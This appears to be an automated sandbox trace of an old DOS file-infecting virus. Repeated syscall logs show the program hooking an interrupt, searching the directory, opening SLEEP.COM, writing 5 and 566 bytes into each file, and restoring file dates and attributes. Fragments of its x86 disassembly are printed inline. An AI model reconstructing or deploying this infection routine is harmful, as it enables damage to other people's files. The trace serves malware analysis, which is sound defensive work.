2018-12-25T11:43:08.654074742Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.668836099Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.676812417Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.680223239Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.682211674Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.688535901Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.700739766Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.702434518Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.711896544Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.723316691Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.726320668Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.735442008Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.742873311Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.74531671Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.757492762Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.765248595Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.768714852Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.771310389Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.774287098Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.78363485Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.785648161Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.800066858Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.811655226Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.814546347Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.823297201Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.832068632Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.834443921Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.840319865Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.84602726Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.849324576Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.852118257Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.854914053Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.8757662Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.877804767Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.880329073Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.88505922Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.888042431Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.895426111Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.902914059Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.905445331Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.917025529Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.924669658Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.928170249Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.931079801Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.935587214Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.94571289Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.952362244Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.961530228Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.972261283Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.976053207Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.983264213Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.990085259Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.992012162Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.008746718Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.016307235Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.019301852Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.021599418Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.024239466Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.033685906Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.035735521Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.043999721Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.055408183Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.059456149Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.066980428Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.0744656Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.077563086Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.080970935Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:09.085478312Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:09.087864737Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.089229452Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:09.091389725Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:08.672754387Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:08.677731761Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:08.678716082Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.679885066Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.681431666Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:08.684329283Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:08.690058773Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:08.696727386Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:08.702833279Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:08.704634881Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:09.217804794Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.224521746Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:09.234193316Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:09.236088254Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:09.238933377Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:09.247311243Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:09.249065002Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:09.270628548Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.281191425Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.284199376Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.293510367Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.301053519Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.303117935Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.327532179Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.334422368Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.337469701Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.340167138Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.343510767Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.362879181Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.365533755Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.373231488Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.379740551Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.383438667Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.389848539Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.396207415Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.398378354Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.408753539Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.415376482Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.418725147Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.420296117Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.422999419Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.431244108Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.43408835Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.440872242Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.447328954Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.449436994Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.453761884Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.46038724Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.462496527Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.471264206Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.477480537Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.481924239Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.483596273Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.486466475Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.495495126Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.497581202Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.50518735Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.515572213Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.518019829Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.524258285Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.531168019Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.532882569Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.537656334Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.542631024Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.545186663Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.54651021Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.549285919Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.565497097Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.56696793Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.569102188Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.57339135Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.575862878Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.582550414Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.58876397Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.590596633Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.601122779Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.6076848Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.610440915Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.61255586Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.614955379Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.624626474Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.626708709Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.633991722Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.643428329Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.647254932Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.653774151Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.66051866Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.662973885Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.672688731Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.679027852Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.682059721Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.683532272Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.686083402Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.694514263Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.695915413Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.703379094Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.714083701Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.716669927Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.728097226Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.734931055Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.737105222Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.739456036Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:09.744015477Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:09.746125253Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.747429692Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:09.749863879Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:08.824215246Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:08.827801069Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:08.828665276Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.82940479Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.8307067Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:08.832707178Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:08.839606399Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:08.846905545Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:08.854118371Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:08.855918487Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:08.874570283Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.891086373Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:08.895184039Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:08.896821238Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:08.900421557Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:08.906144516Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:08.907888754Z	62	PC: 12b6a \| Close file
2018-12-25T11:43:08.9136815Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.920203127Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:08.923920919Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.931521353Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:08.938756286Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:08.941492601Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:08.953854924Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:08.962619945Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:08.96585158Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:08.967692677Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:08.971366009Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:08.981625523Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:08.983935133Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:08.994079214Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.00633025Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.016497407Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.024439097Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.031525837Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.033502437Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.044976261Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.052564955Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.055610957Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.057400971Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.060071125Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.069743256Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.071655913Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.080303771Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.091046209Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.094000252Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.101274121Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.108107514Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.110024998Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.121031442Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.128303386Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.131206244Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.134138867Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.136717696Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.145607371Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.147508724Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.156006765Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.166738061Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.170698623Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.178385211Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.185438676Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.187937136Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.193663896Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.205052182Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.208017186Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.210454785Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.213444191Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.225875588Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.227574589Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.229035835Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.232112482Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.236644163Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.241352356Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.245580081Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.247452943Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.258964126Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.26718995Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.270384073Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.272292955Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.274987807Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.285704389Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.288034647Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.297194038Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.308493774Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.313180194Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.321000672Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.328470267Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.330708272Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.338062614Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.342884994Z	64	PC: 12b3f \| Write file or device (See above)
2018-12-25T11:43:09.345557896Z	66	PC: 12b90 \| Move file pointer (See above)
2018-12-25T11:43:09.346839023Z	44	PC: 12b4a \| Get time (See above)
2018-12-25T11:43:09.349191711Z	64	PC: 12c8e \| Write file or device (See above)
2018-12-25T11:43:09.358305274Z	87	PC: 12b66 \| Get or set file date and time (See above)
2018-12-25T11:43:09.360628943Z	62	PC: 12b6a \| Close file (See above)
2018-12-25T11:43:09.37051949Z	67	PC: 12ba9 \| Get or set file attributes (See above)
2018-12-25T11:43:09.382900492Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.386325Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.400773081Z	63	PC: 12af1 \| Read file or device (See above)
2018-12-25T11:43:09.409100606Z	62	PC: 12af5 \| Close file (See above)
2018-12-25T11:43:09.41057729Z	79	PC: 12ac0 \| Find next file (See above)
2018-12-25T11:43:09.412373686Z	59	PC: 12a99 \| Change current directory
2018-12-25T11:43:09.41553575Z	42	PC: 12b79 \| Get date 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291] 0x12b85: int 0x21 0x12b87: ret 0x12b88: mov ah, 0x42 0x12b8a: xor cx, cx 0x12b8c: xor dx, dx 0x12b8e: int 0x21 0x12b90: ret 0x12b91: mov ah, 0x1a 0x12b93: int 0x21 0x12b95: ret 0x12b96: mov ah, 0x3d 0x12b98: lea dx, word ptr [bp + 0x3b5] 0x12b9c: int 0x21 0x12b9e: xchg ax, bx 0x12b9f: ret 0x12ba0: mov ax, 0x4301
2018-12-25T11:43:09.417494299Z	37	PC: 12aa8 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:09.418470017Z	59	PC: 12ab2 \| Change current directory
2018-12-25T11:43:09.420061618Z	26	PC: 12b95 \| Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1266,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:43:08.931274984Z	61	PC: 12a4e \| Open file (Filename = 'is started by using +the SHELL command in the CONFIG.SYS file. F##¸#ã#,$z$À$%U% %à%,&y&')
2018-12-25T11:43:08.937506938Z	26	PC: 12b95 \| Set disk transfer address
2018-12-25T11:43:08.938699595Z	53	PC: 12a6c \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.939708286Z	37	PC: 12a7e \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:43:08.942584303Z	71	PC: 12a8a \| Get current directory
2018-12-25T11:43:08.945767519Z	78	PC: 12ac0 \| Find first file
2018-12-25T11:43:08.956291184Z	61	PC: 12b9e \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:43:08.969480983Z	63	PC: 12af1 \| Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:43:08.977015935Z	62	PC: 12af5 \| Close file
2018-12-25T11:43:08.979096325Z	67	PC: 12ba9 \| Get or set file attributes
2018-12-25T11:43:09.217830248Z	61	PC: 12b9e \| Open file (See above)
2018-12-25T11:43:09.23371445Z	64	PC: 12b3f \| Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:43:09.236800547Z	66	PC: 12b90 \| Move file pointer
2018-12-25T11:43:09.238752559Z	44	PC: 12b4a \| Get time 0x12b4a: cmp dh, 0 0x12b4d: je 0x12b46 0x12b4f: mov byte ptr cs:[bp + 0x33a], dh 0x12b54: call 0x12c36 0x12b57: mov ax, 0x5701 0x12b5a: mov cx, word ptr cs:[bp + 0x3ad] 0x12b5f: mov dx, word ptr cs:[bp + 0x3af] 0x12b64: int 0x21 0x12b66: mov ah, 0x3e 0x12b68: int 0x21 0x12b6a: xor cx, cx 0x12b6c: mov cl, byte ptr cs:[bp + 0x3ac] 0x12b71: call 0x12ba0 0x12b74: ret 0x12b75: mov ah, 0x2a 0x12b77: int 0x21 0x12b79: cmp cx, 0x7d0 0x12b7d: jb 0x12b87 0x12b7f: mov ah, 9 0x12b81: lea dx, word ptr [bp + 0x291]
2018-12-25T11:43:09.242285093Z	64	PC: 12c8e \| Write file or device (Write 566 bytes on handle 5)
2018-12-25T11:43:09.255623316Z	87	PC: 12b66 \| Get or set file date and time
2018-12-25T11:43:09.258245198Z	62	PC: 12b6a \| Close file
